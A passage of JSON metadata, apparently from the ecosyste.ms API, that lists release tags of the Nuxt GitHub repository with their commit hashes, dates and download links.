Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_u